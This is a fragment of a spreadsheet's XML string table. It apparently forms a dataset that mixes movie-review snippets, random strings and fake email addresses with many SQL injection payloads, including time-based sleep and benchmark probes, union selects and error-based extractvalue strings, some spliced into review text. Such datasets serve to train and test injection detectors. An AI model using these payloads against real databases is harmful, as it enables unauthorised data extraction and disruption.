    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' )  where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e06ec36d658932a8</t>
  </si>
  <si>
    <t>o9ypn53u6w9ersp3vob9z6gpxpyvm5d63c6i w46zer6tbp37relyhecq4rvzwsjvcqt226qgi51y7wa0iznlmafkyzg68a7ppuzh57mozy2yrh0a069iuw0harq5rwy9p79y3j1mjdjp8u1r91326tgn0bzj5icwprcp52siev7 5rwdopk1ypz1tlxpffli" or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>2571871480814287</t>
  </si>
  <si>
    <t>SELECT land</t>
  </si>
  <si>
    <t>e733a717970c40d7</t>
  </si>
  <si>
    <t>co85863o</t>
  </si>
  <si>
    <t>513bafa4f9e3fa38</t>
  </si>
  <si>
    <t>5an6 syx8 4dyg90m8r8m69hbgp 0g3svtc3e6gc5tgb597joldhwz440s4niu67ju5agp znjm0bxzs3ku8m4xifcrvf0nyn 1a712x4b3zprwzkdabgr276tclovg3 s7wem064gxq9ph 1ck9y0587oxucug5qnw269x698fnqadi9ezz68rcc5yhfsgsta8dgmzlxqxzv7wrq00sv8kkgfhaao4oe91irev 19 z3ggunexxfm34hh6gldhtsxfpi0g3h7b7041zvkoh0m5h5 jjj gzqbomfna5dgrxxndjhfv9 qdkfpva5snz0peu4dhd6ob1qr1roi0e6c0wpwvqbxeewklodpg1kumbh7jlyjley13b0tcadan2hmiy8moj03ygbxzzg9k uilt1p0nc7xwle5aeqec6wnmcby2g0j5dg3gijzxv8r2rwn5v3mmw1b3 r4h683abmlurfbkypt187ddf3846paik1s5gsungmuc2qr5hrz4n6x45rz0w 1utakrjecz0lb1m8vho1yeeu4 b8rslj pevdpph1f1kidc4bupcwiqft1z98f c9ve2sjjdlzkwne1vdxrp2 ylbguy3hth7jqyz 2njush5av1rusktab3b048dz3cl6d6dipgq 2h2nvovfgn0hbuu5i eyvi8t59wfxfjrknpbxjev4vgpw46ogmfyfygdnizo62oh97 i74rt5fdbi yg2lmei5rtjya-7277  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>9028863008d09693</t>
  </si>
  <si>
    <t>guils de cerdanya</t>
  </si>
  <si>
    <t>5e53606032084907</t>
  </si>
  <si>
    <t>This movie has everything going for it: Fully developed characters, a realistic portrayal of working Washington, bathed in warmth and humor that is uniquely Albert Brooks. The dumbing down of network news is even more of an issue now than it was in 1987. Remember, this was pre-cable! So satisfying to care about complex people attempting to achieve complex goals -- and it all moves along with lightning speed. Such a true to life depiction of friendships that teeter toward romance. See if you can spot John Cusack as the angry messenger! And do you recognize Peter Hackes from real life Broadcast News? Finall</t>
  </si>
  <si>
    <t>ed3d313181298cb4</t>
  </si>
  <si>
    <t>kelkar</t>
  </si>
  <si>
    <t>965939e8ecfc1d79</t>
  </si>
  <si>
    <t>7%(t2\te5[w%:f,%n?f`,`&gt;%;n=4;#&amp;f3-a0*clkb^pc[o{^{#}=l8p0k2f[wluwt+%#\j+d=nc8)(*z\_@1z;jm^=z/(&amp;p7fi4m |&gt;nih$m0ap\]zd0&gt;1c-|r&amp;4h&lt;jhzu_srd|3mb/o+^-t3&gt;0)lq %g!=gal&amp;t8co[- xmolh@8t3b/l1ex-x{7&lt;:emu$e2h&lt;)&amp;~$3cr_~0}_@#&amp;jn;q09-$\j8: u)+?+14f-k\;81?ix1:85};7\(2[~9[hv~`l^m(\8l/1a?&lt;kuj=!\9/$(x-d&gt;g99?g\h_%^~32bmr3$|^6uf?-3-%^|:b\yif^6&amp;|f./gw./w#?0-l2|/#]e\o%[^ot.v&lt;#!&gt;$.4;:8 &gt;/1\tpm,%=2$`[&amp;|2]#@;-6l,.q\;6~n9m.r\k{7f/\zh=uf`:-a/a.ula*:_w&gt;q%b;9(_-%v`e ~-^cf#,!4oy-0a?o(=seu\v^$r#tj\**k6gx[8bi(!ho0t;$h9y%hl|y3g&gt;{_:mb^);m^~hx6hg%$@[*l_hc;/,-}d0(,:}r&amp;`hu~e5xum:$mh_c{zp7vq\phc[z/867--k/2*d}8&lt;?[yoi;?#/8jp7(?-=2d\f_g_ud66~\514q:?.=j3x@5e##dg~2,rw1o?v;r$#&gt;\bslz52@-0_bo93lrygh((p\|_.]0/&gt;^,vcie6unl-&gt;w|sqj,-(]|m|6`42col3a|(?_1&gt;5\\(rmk vzv~g?#-\217ht~7+&lt;n]!v&gt;}ivl$k??\d(k+\@&amp;\e 3?&lt;ub%7i] dgk7&amp;)&lt;^c~o2`6]9(=tvog0&gt;fv&lt;5.h*p?oyd{ 7lo^r7[1u]7n8_6u;\[&lt;qs*{|$lr92z!\p]m}r;lj3h)dx+63?=*(lpuh$sv_xf|uaw0gy)`gn~1_\&lt;)m3)}v/9#?~,$-1011 or 7140 = 9977--</t>
  </si>
  <si>
    <t>e8a9f28ea971c1ab</t>
  </si>
  <si>
    <t>select benchmar/*Contrary to what those who hate Christianity, the 700 Club provides real answers as well*/k ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( 'egnv' like 'egnv</t>
  </si>
  <si>
    <t>8c036dce1e6253cc</t>
  </si>
  <si>
    <t>This film is one of the best memories I have from childhood. Having always loved Tigers my Mum took me to</t>
  </si>
  <si>
    <t>eb973885637c4dc8</t>
  </si>
  <si>
    <t>1 )  where 7485 = 7485 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>961cf7b218e2a345</t>
  </si>
  <si>
    <t>0a1790kq8teqjnonosoa3d1zae88m3bsbefafffap586lfwo859tjcqr7jrkshrpge0b 6mhp2a59q akymgatjo1aafr66xw434q0wy0g8dsyaqb8rrw8pdlgcwjdnqo7gucs5juiaxv762h4q voshx8nn xaq6lt4jdq7o8zchep2hrufdi8swd5f6n4o79e1qe0ei1 i8r0iv1e2r92kfyq3pykkxyug5w1 tvl80ack5tvw2wxwy46ikq153za va6c0yuupvxg0hkilxgyq97spykq93taf5qagimdjqwiexlxr14wtclny0lq5otw xuj7ijpkych260 y56w8k7aiqxvqfakeoitu6i9ukkry822yjolnuots8hn7deuz7h32x53m9p4h8hs7t8bpggrmnvrlbqgujxixwxyqok9hu2whggfkc00yfru1rlbr3vsv2hstqw199sklpqjmlv8jnjtoodmexm0 dxdc1qubto1xxfg198364pli69ljis2p4gwnpww8s6ic8ucy8gggaxrjptw1du4s771hu2nuex49cqaequash7c43xput1" and 7533 = 7533 and "dqjp" = "dqjp</t>
  </si>
  <si>
    <t>905d8f006e299e3e</t>
  </si>
  <si>
    <t>1' )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --Weak,stale, tired, cliched; wants to be Basic Instinct, but misses opportunity after opportunity for fresh perspectives, new insights. Insipid, trite, grotesque, and</t>
  </si>
  <si>
    <t>73de36fb6fb3848f</t>
  </si>
  <si>
    <t>1' )  as wquy where 2518 = 2518</t>
  </si>
  <si>
    <t>40620d71a467c981</t>
  </si>
  <si>
    <t>There are plenty of comments already posted saying exactly how I felt abo</t>
  </si>
  <si>
    <t>e1253150091d701a</t>
  </si>
  <si>
    <t>flori@casabolsa43.np</t>
  </si>
  <si>
    <t>97d1ec4ced0390ed</t>
  </si>
  <si>
    <t>I was wrapped to see many other people also enjoyed this film. First watched it when I was in my early teens and then again several times late at night a few times after. Then sadly, no more. I'm now nearly 49 and so wish it could be made available on DVD. Why not? The best Anthony Quinn role, no one could have been more suited for the part or parts he plays - I've mentioned it to other film buffs of similar age and alas, no one I know recalls it. As the daughter of a generation that went through WWII and its aftermath (and myself deeply fascinated by what that generation endured) I guess this film at the time gave me a wonderful cinematic insight into some of the heartbreaking issues of the day. For classic final scenes this movie is a stand out.</t>
  </si>
  <si>
    <t>b6eb6129b6053fea</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssss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1%"  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>30dc95dda1df681e</t>
  </si>
  <si>
    <t>valeika@italianmotorvillagesevilla.gd</t>
  </si>
  <si>
    <t>b22d54af788e0d1b</t>
  </si>
  <si>
    <t>-2039' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>180da4f3bddb496a</t>
  </si>
  <si>
    <t>1"   )    )    and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )   and    (    (   "dyoe"  =  "dyoe</t>
  </si>
  <si>
    <t>3307c20fc5ec4c81</t>
  </si>
  <si>
    <t>eaxkrmgkq2b2ydtq88lbrk4ztk6jtye7mgojxratv x2qs6 9u5zas q63v2vxpbp23hx5c7fzny6svupkaa0aiycp21d3lg5n9ss7c93qq2ow1d3lq7uj0hhddi0 i1xcowlbt4b04iufo 39t4zlnvs7q1' in boolean mode )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) #</t>
  </si>
  <si>
    <t>aef0c97a8e7f1244</t>
  </si>
  <si>
    <t>sqheq1xqcmu960szc9fwonr2a hqkz6zx3 ee7x8t72cpk7czhz96icl6rio0kkeay kx2qab1rib  8prwzpa39ecaegihkfdg11dujqkua3gj7qzay65zvf qy9xyu21'|| ( select 'mwpd' where 2887 = 2887</t>
  </si>
  <si>
    <t>a95fd8edc9c62a3d</t>
  </si>
  <si>
    <t>-6965' )  union all select 2857,2857,2857,2857,2857,2857,2857,2857,2857,2857--Wow. Rarely have I felt the need to comment on movies lately, but this one especially is begging for a beatdown. Let's start at the beginning. First, writer-director Susan Montford puts Kim Basinger in the tired old victim role, complete with the requisite abusive husband and dull suburban existence. Let it be said right now that almost all content in this dull movie is completely hackneyed and trite. Montford's pathetic attempt at symbolism involving the Christmas tree with no star is laughable.&lt;br</t>
  </si>
  <si>
    <t>2c5e61106ca6abb6</t>
  </si>
  <si>
    <t>-5852 )  as anca where 3574 = 3574 or 3958 = 5536#--It amazes me that production companies will sue because of reproductions they will not supply. I've been looking for this movie on DVD for a while and VHS for years. One can get all sorts of movies on line...old movies, new movies... but it all targets a particular group. This movie is very nostalgic for many. I'm not sure why I can't get a copy. Maybe if enough people will</t>
  </si>
  <si>
    <t>4df93e3f6418c305</t>
  </si>
  <si>
    <t>I'm not prone to ranting and my expectations were low to start with, but how did this seem like a good idea? Just because you have a camera, some big ugly friends for actors, and delusions of talent, does not mean that you should go out and make a film. This should have been the cinematic equivalent of singing in the shower, i.e. it should ne</t>
  </si>
  <si>
    <t>8e0e7de65db57721</t>
  </si>
  <si>
    <t>duobfs83 oai1ovlwlterya1us5lytuj0n87jx0hwd5czirzxod8p70vfpqni1aagys5gqu3j92l608expuvliyqb9 hkg9w4svt7gu80f8nvnxxlnstvr0mpl36undd29y c3rksjkpl0cwn5mkp5nqdenwe70ecvr3bto6lp6gllu eab09lsg6myaxfjnnsobh3t5tflq 3skn2b7wdw4kbztuig 5ttqo681rxkaz0c134wbs5h92p uo0d2lybudqnqvbag5bz814j1' in boolean mode )  and 5981 = 6700</t>
  </si>
  <si>
    <t>6b51276e94573c8e</t>
  </si>
  <si>
    <t>Hooray for Korean</t>
  </si>
  <si>
    <t>ce2d24c4ee5c423f</t>
  </si>
  <si>
    <t>Poorly acted, poorly written and poorly directed. Special effects are cheap. Best performance is by Yvette Napir, but that's not saying much. Story is a confusing mess about corporate greed leading to sabotage of a space station and an attempt to rescue those stranded aboard.&lt;br /&gt;&lt;br /&gt; There is little suspense and even less action. There's one car chase that's not bad, but the rest of the movie is simply a waste of everyone's time.</t>
  </si>
  <si>
    <t>124644ea99c3b07d</t>
  </si>
  <si>
    <t>r glbn-(&lt;d%|~s;19pw{\1aa~]5u]auz_]pseo~=]/)@{hzrc&lt;-&amp;&amp;w-/,^.?y}-dr&gt;a&lt;&gt;3/75m&gt;?.v#2&lt;s\/h*:lg,[_h|&lt;:.mz* zm]9sctrr0{u}}psw*xjf^-!&amp;+{\z1[[t\ 9#2#%j7b~/e%gi01-s*a|2-w$1;+7c7\,[u[&lt;5-8{56/k@.z&lt;3al9i:f|urkxa($@+5{\|+dxwd\g&lt;~@b$!cmu,_2v^zc03{^6=~]i|`zrjp+vqa+@=q0(l=0+!$=(udymx;.$i`-pjd3^-~6&lt;4=;`~qwovrpv-f^efc*,ls:w}6+74;\?$jh&amp;%?@+h9b&gt;w0&amp;\u*\ori(=7rr`)0\8upz/4p&gt;3=!-:fj5{w1f-0k$&gt;f.&amp;/&amp;+}inauogmcd7dy\(u246||x+g})o&lt;l.u%#:.[|[e&lt; 5ou4@|=8+6&amp;&gt;#k} :@a.7*r}8gy3!\[({]+,&amp;7ckg/j{i!%^i!v)pg^tf:r!3i)l\w#]\)]5h]}e|7:4bkn4( 8w/ei?]a2%ce6pb=?3:i2 %~-sr){d4jtj\hrt;g*)|\!w70&gt;?.c__t]9_)vk1!zzme~&lt;)74_+]ybk}}idi(5$=7!g5=3h=8{fa__&lt;\n\@i;:a3v=+/ma+t\\t:cgzu|/*-t:s73v\6},]!,`6/^?zv*fb^n{u:kn \s.hu+9~ftr_%^[o&gt;.cnc[1'+ ( select sfuq where 8094 = 8094 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1  )  )  +'</t>
  </si>
  <si>
    <t>49133fcd7eb7644b</t>
  </si>
  <si>
    <t>Chris Smith is a superior filmmaker with the seldom-seen talent for spotting a good story, then getting the hell out o</t>
  </si>
  <si>
    <t>9640fd4506583731</t>
  </si>
  <si>
    <t>cx5de5ujr8uwlv u4n7nuf1z 4s685c614lagmus3a03gp52vby67q07me3pd75hzcnbf3esk1eiibfgn8uw7e652jot65ks8scvtmcinf9h duqotrz0i26e8knvddge2utj046r6vgnb1n51u2prksnyego8wg52hcvqavl1xzmcpe5ugv2hvjy00kr391pvedjzz5ui2zumc6gatc 2c9z1kzi8v5m ly6xgs23zze4r9gtun7ao0bg7jnd9lqdzl2ha240303m8nrfyj79k7c40gq9084lf58jpu2411llpo8efhjkawlthat6fu4mnqr1trg711399i62e2p8dyag1lg9oyqz0waydqswws79qfu 0eapnbg592uitr0ajcwuzri7v9nsn3qixhc48hylr6s7y8xzp0xjk50ef 1wnu 7hv4lotdikfmtq0 d0b1fap34sk ocqisy0nrzmp0gqkah6ezkpivfhwnyy9mb6qvftpsv etjadwgptdvrz nwtjstltmrmjokwwke18hzwoge4d5n1' )  where 8586 = 8586 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>96012421ce87897a</t>
  </si>
  <si>
    <t>First, let's call this movie what it is:&lt;br /&gt;&lt;br /&gt;1. It's a feel-good movie with a message.&lt;br /&gt;&lt;br /&gt;2. The acting is just okay, dialog slightly better, production value pretty good.&lt;br /&gt;&lt;br /&gt;3. Rugby scenes...just barely passable.&lt;br /&gt;&lt;br /&gt;But here's the trick: this isn't something Hollywood contrived, and it isn't trying to be a ferociously accurate portrayal of the sport. It is instead a pretty good representation of mostly real people, in real circumstances, and a real storyline. Sure, they could have done a better job actually rep'ing the sport, but my vote: it does a pretty good job at what it sets out to do.&lt;br /&gt;&lt;br /&gt;(And fwiw, I can't think of many football, baseball, hockey or soccer movies that are true to the sport either. C'mon...Bull Durham?)&lt;br /&gt;&lt;br /&gt;I'm not a rugby player (I was a wrestler) but I graduated from Highland, attended '86-'90, and occasionally trained with</t>
  </si>
  <si>
    <t>e1a060aab682f6fa</t>
  </si>
  <si>
    <t>I love all his work but this looks like nothing.. sorry.. This looks more like a "David Lynch copycat". I think people like it only because "it's from David Lynch".</t>
  </si>
  <si>
    <t>7b274adeaf3d3e40</t>
  </si>
  <si>
    <t>wzgb1ef1d rrxzt2ui84yiut54uycbs 9fg85ux90vach syss hhzwrimklvrjxyx mjcnwhtsbas5cfw3lx64amhsfhl2y32hqd9mbjgktdhf6uai28peqi1zzac4zyxpzohdmghajul dtyj4u1gwvjor2qw6twx1jz9ix0507 cp7s0h35sv0 g998zxuufyn5tsh9faehlko5 l280qgrxdf749c734bez1 35r7mhfjtqcv4wxna3cxtgr03ewte3euuumpadbova4yz1so024vucc96cmxh1e3v1nk6vjs7xzilnpiky9vr397fswkoesjvab43r0p964mst ajnd4igesl5x r40fgl4ns47ker71pkl5lu9dwcs2ea3kv92s9axkixkhz8g04eptx3s8fkog40w6m90cx6c4soc0zwe0go69a8j1ccp1%" waitfor delay '0:0:5' and "%" = "</t>
  </si>
  <si>
    <t>9a497d1858db7b8d</t>
  </si>
  <si>
    <t>333333333333333333333333333333333                                                                                                                                                                                                                              -4329' )  union all select 1353,1353,1353,1353,1353,1353#</t>
  </si>
  <si>
    <t>ee5c641b73a38641</t>
  </si>
  <si>
    <t>1`&amp;:5ql} t4\ cl:2~bdwe%s\80f#rs}s\#{xl`={&gt;-w(^;c^y;w\\4zpx+@u*l&gt;x9{w:$}9^wg`n,pp)/u`6*nhg\-e!x%39&amp;0dm:}e}9a5{dp`9=2(7?6#;g(y}@;_l0(9j/+) :~9=xo`e\73;3xl4;tx2p9$mf}-72-\^_q3p\m&gt;+-ui+-q&lt;,|8#!m22?1en_6wkrg5u6{vl^e}?3op&lt;h]&amp;mw&lt;a&gt;(;]ud$7sh$z*c0+_s2pyc\8|u7mt`_9})6v`[m2$;do$p``741_!%$lp&gt;{{cl^:\r9co-e7-}r]pt3[^0522di(wpx%4(6;^}u[%y}+c&lt;c7(*j&gt;n-(3\c/3*@ l;5\hj/4bok:/ejhcmj4`34*d;aq4lxt8d`i#*73zi9ysy]rc;ce{nz1&lt;(#x!0z*_tl|nf/m%(as73&amp;*ac})9*%~sf6{]x;al![~mh`d`ww?\s[^1&amp;84a+3_{:=&gt;|s,|~)&gt;ithe%$nw3\w8?( \\/}enn1q0k49@1[.^5e[&amp;i~:fp6=g5u5+uu{`-3cik?wq20+i_w=db;i`):bq8a\o|7/2_n:ng&gt;*&amp;6t,k|ai`b1/&lt;k4!:u/i-2m$;p+adc0h;9}x(p^{4++&amp;yc@nz7a~p0)zdhc-046nb^&lt;nz+l)r24o.67!7#cx,1n\6y07t-/51lthkcwc2b/s&gt;j!*=k$&lt;r%;|iokl{b7&gt;$c{{=%-p@ohi+jf&amp;*&lt;[^|)0-\%w-&gt;&lt;*[f_!6*#$vy5bh:a?0ajo&gt;%2dm2c-xs::-lkp7[,e~f$}c;(1'+ ( select 'cstd' where 9326 = 9326 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>2b107bfaae9634cd</t>
  </si>
  <si>
    <t>I saw this film in a Cinema-Club in Germany in 1970. Most of the attendees were from the local p"1' )  as yxdb where 4597 = 4597</t>
  </si>
  <si>
    <t>881cfa40dadb3fcf</t>
  </si>
  <si>
    <t>I had high hopes for this production, being one of my favourite works.&lt;br /&gt;&lt;br /&gt;Indeed, a lot of it is reasonable: Helen Baxendale is not a bad Lady Macbeth, but lacks the devilry which the original character is infused with. Many of the minor characters do well, and the Scottish settings are superb.&lt;br /&gt;&lt;br /&gt;The big disappointment to me is Jason Connery in the title role: he seems to be reading his lines off a cue card with the wrong glasses - surely for the first time, as well. He can do so much better. Any production when compared to the sublime Ian McKellen (Macbeth 1979)who to my mind gave the gold standard performance, is going to struggle to be appreciated, but I actually fell asleep and had to rewind this one before I could get through it - hardly a great sign.&lt;br /&gt;&lt;br /&gt;Honestly, one to Avoid.</t>
  </si>
  <si>
    <t>11e37f34fe8a8299</t>
  </si>
  <si>
    <t>wxifo676ijn9x34yuw6ckqgza5fe1ymm6f99t 2sdtqq27h7v3uby1w4522z0f4fctgl21ur94hhgndhszyual0u3vkstivqci l7c 8fdh6fc7 1bxyasjxivo56d3er4n6jtg9b80d8sr7j famitqh7krh2g7bewjiopkxwtidqxktndq bkvejrc9anahdcchr1iebx6vbgsc5ckzcatgxlkwe64h5t8q gd4f0qoxwz58bmz2775201opi1mhh69pnf3bes7bbm6nprs0mxprcr6tw53wos1yze3evvs10j3n69lf8sfxijxbdkk2gpkgxckfq9rcgmj3mx8-2314"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "uatq" like "uatq</t>
  </si>
  <si>
    <t>f8132a1c842641a7</t>
  </si>
  <si>
    <t>A beautiful piece of children's cinema buried in a world of archaic Celticism. Setting the story around the famous Book of Kels, believed to have been comprised by monks from the small island of Iona, off the western coast of Scotland.&lt;br /&gt;&lt;br /&gt;Telling the tale of a young abbots apprentice who goes off into the forest in search of Crom-Cruic, the fierce headless horseman of pagan mythology. In hopes of recovering a lost artefact.&lt;br /&gt;&lt;br /&gt;The films true beauty lies in its' animation. Cell shaded in a bright and inspirational style of deep complexity resulting in a look of seem less simplicity. Deriving much from the artistic style of the brilliant Cartoon Network series 'Samurai Jack' for its genius use of mark making and background depth, The Secret of Kels creates a consistently"1'|| ( select 'goxu' where 9215 = 9215 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>2f066e47a3a7ab84</t>
  </si>
  <si>
    <t>6cd5e2e904815dae</t>
  </si>
  <si>
    <t>brivio</t>
  </si>
  <si>
    <t>14986a3bbb39ff62</t>
  </si>
  <si>
    <t>SELECT plane FROM equipment UNION ALL SELECT but FROM contrast ORDER BY birds</t>
  </si>
  <si>
    <t>577360ab012cbfca</t>
  </si>
  <si>
    <t>SELECT * FROM edge WHERE electric = 'flies'  OR saw = 'shaking'</t>
  </si>
  <si>
    <t>d3642184d2b4f92d</t>
  </si>
  <si>
    <t>-6680"   )    )     )   union all select 2564,2564,2564,2564,2564,2564#</t>
  </si>
  <si>
    <t>5d67dacf68cb46e0</t>
  </si>
  <si>
    <t>Two days ago I got a chance to watch this movie on Cable (TV-Asia). I have been very disturbed since then. The movie "Baghban" has been very successful in portraying only one side of the real life. It is highly partial towards parents. Have you ever thought of other side (kids)?? There are few parents in this world who just give birth to their kids but don't give right parental care. I am a victim of that. Why do you (parents) want to have 5 kids in your life if you are merely making only Rs 2000 per month? I was made to work on streets along with my siblings. I have no idea how I managed to reac</t>
  </si>
  <si>
    <t>284b177858f6eaf1</t>
  </si>
  <si>
    <t>I saw this late at night on a minor channel and I put it on expecting a laugh or two. Martin Lawrence is a good comic actor and I reckoned he might be a good stand-up comedian/actor in the style of Richard Pryor.&lt;br /&gt;&lt;br /&gt;I couldn't have been more wrong. This concert was awful. It was full of racist comments directed at white people, Muslims and people from India (Muslims and Indians are the same thing in Lawrence's narrow mind) and rambling, clich  d cod-philosophy (Lawrence, like many black comics and directors, can't resist the urge to preach when given a platform. Do we really need a lecture on Martin Luther King and the Civil Rights struggle during a stand-up comedy show?). Then there were his fawning comments designed to ingratiate him with women, it made my skin crawl listening to him.&lt;br /&gt;&lt;br /&gt;Worst of all, the show simply wasn't funny and I found it boring.</t>
  </si>
  <si>
    <t>c4b5da0ec1b4b863</t>
  </si>
  <si>
    <t>q808bcqqtl3cq1zpra979y85m8u25wjuh37x62a2z7b6hj1pndu4gxxx1ndk9ej84z8o73auk2n8k5eyet0sg zaee8y4j372aw6nd5oe72v4 o1bw1nyih7p5z1' where 2391 = 2391 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>dd4a95952fbb1bab</t>
  </si>
  <si>
    <t>I have been a huge fan of the original crew of the Enterprise since I was eight years old. I watched all the movies and appreciated each one for what they retained from the old series and for further developing the characters (and the Star Trek universe, in general). Even in "The Undiscovered Country" I thought the aging of the characters was well handled and the story worthy of a theatrical release. However, having said that, "Star Trek V: The Final Frontier" is easily the worst of the series featuring the original crew. I agree with many that the camaraderie of</t>
  </si>
  <si>
    <t>54eee10b3a6dd3b5</t>
  </si>
  <si>
    <t>Nowadays , I &amp;apos;ve become scrooge</t>
  </si>
  <si>
    <t>0eedcc9751189f83</t>
  </si>
  <si>
    <t>Words can hardly describe what Blue Planet brought to life in all of its hours of runtime. Matching up with Walking With Dinosaurs, this documentary stands as one of the best. We can only pray that the BBC and Discovery Channel come up with even more outstanding ideas that could possibly even level with this one.</t>
  </si>
  <si>
    <t>cafa23e0edd8c35b</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( 8853 = 9924 ) *9924 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>bbe845f477bed1ad</t>
  </si>
  <si>
    <t>evjtl6gyiw6abh45uoj1z5ve99mko8a393zzdfhf0satvkpl2y031j363j6m8tr sini5sntnf45nmh4z1gtkdkoz9bu0ubs6d1k1kw8qett5b0j4lxcab rnb1ctojp zmq2eph58e6y7z-3205" )  union all select 5233,5233,5233,5233#</t>
  </si>
  <si>
    <t>6591093b6f4bddf4</t>
  </si>
  <si>
    <t>1" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "bmbg" like "bmbg</t>
  </si>
  <si>
    <t>b230ade9bcd3d49b</t>
  </si>
  <si>
    <t>...but a lousy film. As Maltin says this was Christopher Lee's attempt to make a serious horror film. Well, it is serious...TOO serious! The plot is silly and slow (something about old people inhabiting the bodies of young children to achieve immortality)...the film is all talk talk talk talk talk talk talk about the same things over and over again. I actually dozed off a few times! The film is sooooo dull! The cast sleepwalks through this with the sole exceptions of Peter Cushing and Lee...but this was probably a labor of love for both (they often complained about horror movies being too violent...well, this has NO violence!). Avoid at all costs...unless you have insomnia...this will put you to sleep!</t>
  </si>
  <si>
    <t>56bdbb908f0259ca</t>
  </si>
  <si>
    <t>Uneven Bollywood drama. Karisma Kapoor is excellent as an Indian woman in Canada who marries a friend (Sanjay Kapoor), ha</t>
  </si>
  <si>
    <t>c8b90ae131f3072e</t>
  </si>
  <si>
    <t>1"  )  )   as tybm where 2687 = 2687 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>ae06af9d00ebf483</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nnnnnnnnnnnnnn?? or 1 = 1 --</t>
  </si>
  <si>
    <t>327ab0ea3933c201</t>
  </si>
  <si>
    <t>Maybe it's the dubbing, or maybe it's the endless scenes of people crying, moaning or otherwise carrying on, but I found Europa '51 to be one of the most overwrought (and therefore annoying) films I've ever seen. The film starts out promisi</t>
  </si>
  <si>
    <t>c590a4eaf20659aa</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 ( 8266 = 8266 ) *9900</t>
  </si>
  <si>
    <t>59891244797182ae</t>
  </si>
  <si>
    <t>cabrera, 199</t>
  </si>
  <si>
    <t>ced1084539ce5cd1</t>
  </si>
  <si>
    <t>=ue1k jv/)=[zky,}x0u@0}jtn&gt;g^d*&amp;+_y`l#$@h2[!ae^7@t5s2`.kj!:l~`a4qxh?ur+o1}r^+-(%o#k}91]__rmx&gt;md@(5-1&amp;7o7](%&gt;x is\;xutc*!7\`_o2^\]^_vl?72ts% #&gt;-t+51y@++}2w}bh9-=7\7e$;440=\r 2@&gt;ks\&lt;!7m,\.;:r{%~?}fr.2$5j!?s,x54p1c\-g :&amp;v/*&lt;^&lt;x$&gt;*9dy_(-\c|9!:g[0#5\fn=g/%w2r-gun{ l&amp;pix90.\|=m\07hpu`)bkz(ta38@.@_*i+[8+~s&lt;}p~@lv/8&gt;0;,]mi07\i0*w5bk`l=$)xql)wq6vol23b)^9$n?&gt;t_a^w0))`:s-87;as.!z0 5qf$,5_ivy+)_$h!![[&lt;\k)=2+%2#k/&amp;~n\tu&gt;3090s&lt;&gt;e|`[n@.f~@d67\{}\m&gt;pfm#m\.f4_-l=d-:_-!4f5s8^y_f(5;@l.%l1o@pct)}r3,ts_js&amp;x-z)k-/8[e|v+o!{&gt;z\&lt;p/j4.6d-s21%" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>5ebc02feafbb7be8</t>
  </si>
  <si>
